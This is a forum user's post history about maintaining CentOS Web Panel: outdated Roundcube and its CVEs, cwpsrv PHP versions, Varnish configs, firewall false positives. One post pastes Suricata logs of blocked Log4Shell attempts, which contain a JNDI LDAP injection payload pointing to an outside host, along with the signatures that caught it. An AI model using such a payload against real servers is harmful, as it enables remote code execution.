Messages - tomkolp

1
E-Mail / Re: roundcube CVE-2023-5631
« on: November 05, 2023, 07:52:59 PM »
Roundcubemail has long been unsupported in cwp. Now this is a security risk. Each of my domains allows access to roundcubemail via the /webmail suffix.

How will it turn off along with the whole roundcube?

Have you tried installing version 1.5.6? I haven't tried it yet, but the 1.5.x series works for me, the php problem is from 1.6.x.

Edit:
I followed this guide, just change the version from 1.5.4 to 1.5.6 everywhere and it works:
https://www.alphagnu.com/topic/33-update-cwp-roundcube-mail-version-154-%E2%80%93-control-web-panel/

2
Information / Re: Roundcube version
« on: February 20, 2023, 09:40:10 AM »
What versions of roundcube are supported by cwp?  Index.php file says version 1.2.  Roundcube website lists 1.6 as the stable version.
Unfortunately version 1.5.3 is the last one working.
https://forum.centos-webpanel.com/index.php?topic=12064.msg43232#msg43232

3
Updates / Re: How can update PHP for cwpsrv
« on: February 07, 2023, 12:17:21 PM »
https://forum.centos-webpanel.com/index.php?topic=12064.msg43232#msg43232
I've been waiting for an update like this for months.
May there be an update sooner than the discovered CVEs in Roundcube.

Is it possible to completely remove Roundcube?

4
E-Mail / Re: Roundcube update not working due to php version of cwpsrv
« on: January 13, 2023, 12:10:54 PM »
Cwpsrv has its own fpm. The service is called cwpsrv-phpfpm and cwp-phpfpm. They use /usr/local/cwp/php71 (It's actually 7.2). I'm working on an update for you, but work 60 hours a week, so not a lot of time.
Do you know when the new version of Roundcube will be available? How to completely disable Roundcube in CWP when CVE vulnerabilities appear in outdated version 1.5.3?

5
How to / Re: Cronjob for WPallimport
« on: August 09, 2022, 09:48:37 AM »
I use curl and it works. Connect via ssh and type in the console, or show the cron logs.

6
I wanted to update roundcube to 1.6 but roundcube requires a minimum php 7.3 version. Unfortunately version 1.5.3 is the last one working.

7
CSF Firewall / Re: lfd: (WPLOGIN) WP Login Attack (false positives)
« on: May 14, 2022, 12:18:55 PM »
I have the same problem. My wordpress has an additional security of 2fa. Therefore, each login generates two entries. Just log in -> log out -> log in again to be blocked. Preventing my country from being blocked is not a good solution.

8
Hi friends ...

We have had some problems with varnish ...
----------------------------------------------------
Error 503 Backend fetch failed

Backend fetch failed
Guru Meditation:

XID: 1279924
----------------------------------------------------

We use webserver configuration nginx-varnish-apache-php-fpm...
After some study/investigation of internet we found recommendations some changes in config files ...

we have added them to the files in: /etc/varnish/default.vcl
and we have added them have updated files in : /usr/local/cwpsrv/htdocs/resources/conf/web_servers/vhosts/varnish/default.tpl


Then we have updated all domains in CWP > WebServers Domain Conf
And all changes from default.vcl or default.tpl were updated in files in all domain files: /etc/varnish/conf.d/vhosts

After this was everything OK and Error 503 Backend fetch failed .... they came only very rarely ....


But the biggest that after some time (may be after CWP update) the config files were rewritten to old ones ...
files in : /usr/local/cwpsrv/htdocs/resources/conf/web_servers/vhosts/varnish/default.tpl
and
all domain files: /etc/varnish/conf.d/vhosts

all our changes were lost ...

Please why ???

we think that it is very BAD!!!

Can you do something with this ???

Thanks

Juraj
I have the same problem with varnish, can I ask for information what should be changed in these templates?

9
CentOS 7 Problems / Re: log4j security issue
« on: December 13, 2021, 11:40:31 AM »
External firewall

10
CentOS 7 Problems / Re: log4j security issue
« on: December 13, 2021, 11:15:44 AM »
I attach to the question. I also do not know if cwp is susceptible. Attempts to exploit this vulnerability are already appearing on the firewall.
Code:
2021-12-12T00:57:22 suricata[78162] [Drop] [1:10006897:2] ATTACK [PTsecurity] log4j RCE aka Log4Shell attempt (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 143.198.183.66:43588 -> xx.xx.xx.xx:80
2021-12-12T00:57:22 suricata[78162] [Drop] [1:2034649:1] ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 143.198.183.66:43588 -> xx.xx.xx.xx:80
2021-12-12T00:57:22 suricata[78162] [Drop] [1:2034647:1] ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228) [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 143.198.183.66:43588 -> xx.xx.xx.xx:80
2021-12-12T00:57:22 suricata[78162] {"timestamp":"2021-12-12T00:57:22.196130+0100","flow_id":793174073283018,"in_iface":"bge1","event_type":"alert","src_ip":"143.198.183.66","src_port":43588,"dest_ip":"xx.xx.xx.xx","dest_port":80,"proto":"TCP","alert":{"action":"blocked","gid":1,"signature_id":10006897,"rev":2,"signature":"ATTACK [PTsecurity] log4j RCE aka Log4Shell attempt (CVE-2021-44228)","category":"Attempted Administrator Privilege Gain","severity":1,"metadata":{"created_at":["2021_12_10"],"updated_at":["2021_12_10"]}},"http":{"hostname":"xx.xx.xx.xx","url":"/","http_user_agent":"${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}","http_method":"GET","protocol":"HTTP/1.1","length":0},"app_proto":"http","flow":{"pkts_toserver":3,"pkts_toclient":1,"bytes_toserver":372,"bytes_toclient":74,"start":"2021-12-12T00:57:22.070090+0100"}}
2021-12-12T00:57:22 suricata[78162] {"timestamp":"2021-12-12T00:57:22.196130+0100","flow_id":793174073283018,"in_iface":"bge1","event_type":"alert","src_ip":"143.198.183.66","src_port":43588,"dest_ip":"xx.xx.xx.xx","dest_port":80,"proto":"TCP","alert":{"action":"blocked","gid":1,"signature_id":2034649,"rev":1,"signature":"ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)","category":"Attempted Administrator Privilege Gain","severity":1,"metadata":{"attack_target":["Server"],"created_at":["2021_12_10"],"cve":["CVE_2021_44228"],"deployment":["Internal","Perimeter"],"former_category":["EXPLOIT"],"signature_severity":["Major"],"tag":["Exploit"],"updated_at":["2021_12_10"]}},"http":{"hostname":"xx.xx.xx.xx","url":"/","http_user_agent":"${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}","http_method":"GET","protocol":"HTTP/1.1","length":0},"app_proto":"http","flow":{"pkts_toserver":3,"pkts_toclient":1,"bytes_toserver":372,"bytes_toclient":74,"start":"2021-12-12T00:57:22.070090+0100"}}
2021-12-12T00:57:22 suricata[78162] {"timestamp":"2021-12-12T00:57:22.196130+0100","flow_id":793174073283018,"in_iface":"bge1","event_type":"alert","src_ip":"143.198.183.66","src_port":43588,"dest_ip":"xx.xx.xx.xx","dest_port":80,"proto":"TCP","alert":{"action":"blocked","gid":1,"signature_id":2034647,"rev":1,"signature":"ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)","category":"Attempted Administrator Privilege Gain","severity":1,"metadata":{"attack_target":["Server"],"created_at":["2021_12_10"],"cve":["CVE_2021_44228"],"deployment":["Internal","Perimeter"],"former_category":["EXPLOIT"],"signature_severity":["Major"],"tag":["Exploit"],"updated_at":["2021_12_10"]}},"http":{"hostname":"xx.xx.xx.xx","url":"/","http_user_agent":"${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}","http_method":"GET","protocol":"HTTP/1.1","length":0},"app_proto":"http","flow":{"pkts_toserver":3,"pkts_toclient":1,"bytes_toserver":372,"bytes_toclient":74,"start":"2021-12-12T00:57:22.070090+0100"}}

11
CentOS-WebPanel GUI / Re: Security incidents will not load
« on: November 29, 2021, 07:13:29 AM »
Security incidents will not load in CWPpro version: 0.9.8.1102
Code:
Uncaught SyntaxError: Unexpected end of JSON input
    at JSON.parse (<anonymous>)
    at HTMLDocument.<anonymous> (index.php?module=security_center:2881)
    at n (js.php:2)
    at Object.fireWith (js.php:2)
    at Function.ready (js.php:2)
    at HTMLDocument.B (js.php:2)

12
CentOS-WebPanel GUI / Security incidents will not load
« on: November 23, 2021, 12:53:39 PM »
Security incidents will not load in CWPpro version: 0.9.8.1102
